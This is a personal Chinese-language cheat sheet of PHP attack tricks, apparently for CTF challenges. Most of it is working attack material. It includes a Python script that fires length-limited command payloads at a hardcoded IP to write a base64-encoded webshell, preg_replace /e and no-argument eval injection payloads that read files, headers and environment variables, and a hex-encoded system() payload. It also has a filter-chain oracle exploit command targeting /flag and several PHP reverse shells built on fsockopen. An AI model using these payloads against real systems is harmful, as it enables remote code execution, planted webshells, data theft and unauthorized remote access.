PHP tricks备忘录

想起来就记录下，想不起来就不记录（

rce限制长度

#!/usr/bin/python
# -*- coding: UTF-8 -*-

import requests

url = "http://152.136.11.155:10109?6={0}"
print("[+]start attack!!!")
with open("payload.txt","r") as f:
    for i in f:
        print("[*]" + url.format(i.strip()))
        requests.get(url.format(i.strip()))

#检查是否攻击成功
test = requests.get("http://152.136.11.155:10109/1.php")
if test.status_code == requests.codes.ok:
    print("[*]Attack success!!!")

>dir
>f\>
>ht-
>sl
*>v
>rev 
*v>0
>hp
>p\\
>1.\\
>\>\\
>-d\\
>\ \\
>64\\
>se\\
>ba\\
>\|\\
>\=\\
>w=\\
>pO\\
>V0\\
>bM\\
>1R\\
>PU\\
>1B\\
>kX\\
>Cg\\ 
>hb\\
>XZ\\
>gZ\\
>HA\\
>a\\
>9w\\
>PD\\
>S}\\
>IF\\
>{\\
>\$\\
>o\\
>ch\\
>e\\
sh 0
sh f

preg_replace /e利用

<?php
// PHP_VERSION = 5.x
$a = $_GET['a'];
//?a={${phpinfo()}}
echo preg_replace("/(\S*)/e",strtolower("\\1"),$a);
?>

无参rce

<?php
highlight_file(__FILE__);
$code = $_GET['c'];
if (';' === preg_replace('/[^\W]+\((?R)?\)/', '', $code)) {
    eval($code);
}
else{
    echo "fail";
}

// ?c=var_dump(scandir(pos(localeconv())));查看当前目录
// ?c=var_dump(getenv());
// ?c=phpinfo();
// ?c=highlight_file(next(array_reverse(scandir(pos(localeconv())))));读除了index的另一个当前目录文件
// ?c=eval(end(getallheaders()));请求头第一个为phpinfo();
// ?c=eval(array_rand(array_flip(getallheaders())));
// ?c=eval(end(pos(get_defined_vars())));&a=phpinfo();
// ?c=highlight_file(session_id(session_start())); Cookie:PHPSESSID=文件名

import requests
def str2hex(payload):
  txt = ''
  for i in payload:
      txt += hex(ord(i))[-2:]
  return txt
payload = str2hex("system('whoami');")
files = {
    payload: b'extrader'
}
r = requests.post("http://127.0.0.1/index.php?c=eval(hex2bin(array_rand(next(array_reverse(get_defined_vars())))));", files=files, allow_redirects=False)  # allow_redirects=False 禁用重定向处理
# 如果get_defined_vars()的FILE是最后一个值，就用end
print(r.content.decode())

文件处理函数的无回显利用

file($_POST['a']),file_get_content($_POST['a'])等
直接跑脚本：https://github.com/synacktiv/php_filter_chains_oracle_exploit

python filters_chain_oracle_exploit.py --target http://192.168.181.141 --file /flag --parameter a --proxy http://127.0.0.1:8080

php反弹shell

<?php
$sock=fsockopen("ip",port);
exec("sh <&3 >&3 2>&3");

php -r '$sock=fsockopen("ip",port);exec("sh <&3 >&3 2>&3");'

可能会一连上直接掉

<?php
$sock = fsockopen($ip, $port);
$descriptorspec = array(
        0 => $sock,
        1 => $sock,
        2 => $sock
);
$process = proc_open('sh', $descriptorspec, $pipes);
proc_close($process);

sh和/bin/sh都试试